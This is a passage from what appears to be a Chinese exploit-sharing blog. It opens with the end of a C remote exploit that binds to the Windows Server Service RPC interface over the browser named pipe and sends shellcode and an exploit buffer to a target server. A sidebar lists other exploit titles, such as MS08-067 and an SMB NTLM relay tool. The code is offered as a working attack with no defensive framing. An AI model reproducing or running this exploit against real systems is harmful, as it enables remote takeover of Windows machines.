WNetAddConnection2(&nr, "", "", 0) != 0 ) { printf( "failed\n" ); return 0; } else { printf( "success!\n" ); } _snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server); printf( "open \\\\%s\\pipe\\browser ....", server ); hFile = CreateFile( szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if ( hFile == (HANDLE)-1 ) { printf( "failed!\n" ); return 0; } else { printf( "success!\n" ); } printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" ); BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0"); printf( "Send shellcode ....\n" ); TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL); printf( "Send Exploit ...... \n" ); TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL); CloseHandle( hFile ); return 0; }

分类: 矩阵毒刺标签: Exploit

Chinadu's Blog

存档

Discuz! Remote Reset User Password Exploit

Oracle Database Vault ptrace(2) Privilege Escalation Exploit

PHP 5.2.6 (error_log) safe_mode Bypass Vulnerability

VideoScript <= 4.0.1.50 Admin Change Password Exploit

No-IP DUC <= 2.1.7 Remote Code Execution Exploit

Opera 9.62 file:// Local Heap Overflow Exploit

FREEze Greetings 1.0 Remote Password Retrieve Exploit

FloSites Blog Multiple Remote SQL Injection Vulnerabilities

MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)

Discuz! 6.x/7.x SODB-2008-13 Exp（全自动获取SHELL带日志功能）

SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)

MS Windows Server Service Code Execution Exploit (MS08-067)

About Me

站内搜索

日历

最新文章

热门文章

近期评论

文章归档

Categories

Blogroll

Archives

2012 年二月
一	二	三	四	五	六	日
« 一
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29